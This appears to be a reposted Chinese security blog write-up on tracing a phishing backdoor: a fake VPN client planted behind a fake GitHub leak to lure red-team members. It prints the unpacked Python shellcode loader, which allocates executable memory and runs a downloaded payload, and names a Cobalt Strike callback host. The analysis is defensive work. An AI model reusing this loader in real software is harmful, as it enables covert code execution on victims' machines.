记一次实战溯源

admin 2022年5月12日11:20:36应急响应评论4 views2208字阅读7分21秒阅读模式
请点击上面 记一次实战溯源 一键关注!

来自公众号:先知社区

在某次攻防演练信息收集的过程中,偶然发现伪装Github信息泄漏进而钓鱼红队人员的后门。

下面展开有趣的分析溯源过程。

0x01 信息收集

GIthub信息泄漏

根据甲方信息进行常规的Github敏感信息收集偶然发现一个仓库不简单

记一次实战溯源


这不是mysql账号密码泄漏了吗,愉快的打开Navicat

记一次实战溯源


失败....于是访问源码的8080端口查看一番,发现一个管理后台

记一次实战溯源


弱口令

针对后台尝试一波弱口令,admin/admin 嗯~进来了

记一次实战溯源


进来之后竟然发现账号密码而且客户端解压密码都贴心的放了出来

记一次实战溯源

到这里我竟然没有察觉到任何异常,以为能够拿到VPN入口权限;抓紧下载VPN客户端。


解压出来这个样子,emmm。。还没发现异常

记一次实战溯源


0x02 分析溯源

还好有谨慎的习惯,放入虚拟机瞅瞅。

哦豁,竟然提示不兼容当前系统;看到弹窗有Pyhton代码编写的特征。感觉到前面的打点由过于丝滑,不自然的警觉了起来。

包括前面弱口令的提交方式竟然为admin.php?user=admin&passwd=admin

记一次实战溯源

由于发现VPN客户端为python语言编写,更不对劲了,反编译看下。


解包

python3 pyinstxtractor.py vpnclient64.exe


记一次实战溯源


生成一个以 exe文件名+_extracted 的文件夹,这个就是解包后的数据

记一次实战溯源

记一次实战溯源

PyInstaller打包后,pyc文件的前8个字节会被抹掉,所以最后要自己添加回去。


添加头

根据struct.py文件

记一次实战溯源

记一次实战溯源


源码

得到py文件,easyvpn64.py为后门主程序,其中执行shellcode代码隐藏至图片中。

记一次实战溯源


通过requests请求OSS存储中的图片,图片内容为shellcode加载器。

记一次实战溯源


shellcodeLoader部分

记一次实战溯源

import base64
import ctypes

str = b''
sc_base64 = (base64.a85decode(str)).decode('utf-8')
shellcode = bytearray(bytearray.fromhex((base64.b64decode(sc_base64)).decode('utf-8')))


ptr = ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))

handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0),
                                             ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))


知道shellcodeloader加载方式就好办了,提取CS回连地址。

记一次实战溯源


溯源

回连地址:Host: cs.xxx.cn

nslookup解析地址

记一次实战溯源


根据IP地址定位在某宿舍

记一次实战溯源


直接溯源到人,tg结合一波。

记一次实战溯源


0x03 总结

在攻防演练过程中一定要小心,防止被钓鱼。另外这个钓鱼的兄弟已经小本本记下了。。。

记一次实战溯源

「天億网络安全」 知识星球 一个网络安全学习的星球!星球主要分享、整理、原创编辑等网络安全相关学习资料,一个真实有料的网络安全学习平台,大家共同学习、共同进步!

知识星球定价:199元/年,(服务时间为一年,自加入日期顺延一年)。

如何加入:扫描下方二维码,扫码付费即可加入。

加入知识星球的同学,请加我微信,拉您进VIP交流群!

记一次实战溯源

朋友都在看

▶️3保1评 | 分保、等保、关保、密评联系与区别

▶️等保2.0丨2021 必须了解的40个问题

▶️等保2.0 三级 拓扑图+设备套餐+详解

▶️等保2.0 二级 拓扑图+设备套餐+详解

▶️等保2.0 测评  二级系统和三级系统多长时间测评一次?

▶️等保2.0系列安全计算环境之数据完整性、保密性测评

▶️等保医疗|全国二级、三乙、三甲医院信息系统安全防护设备汇总

▶️国务院:不符合网络安全要求的政务信息系统未来将不给经费

▶️等级保护、风险评估和安全测评三者的区别

▶️分保、等保、关保、密码应用对比详解

▶️汇总 | 2020年发布的最重要网络安全标准(下载)

▶️2022版 | 全国网络安全常用标准(下载)

欢迎扫描关注【天億网络安全】公众号,及时了解更多网络安全知识

原文始发于微信公众号(天億网络安全):记一次实战溯源

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月12日11:20:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次实战溯源 http://cn-sec.com/archives/1000878.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: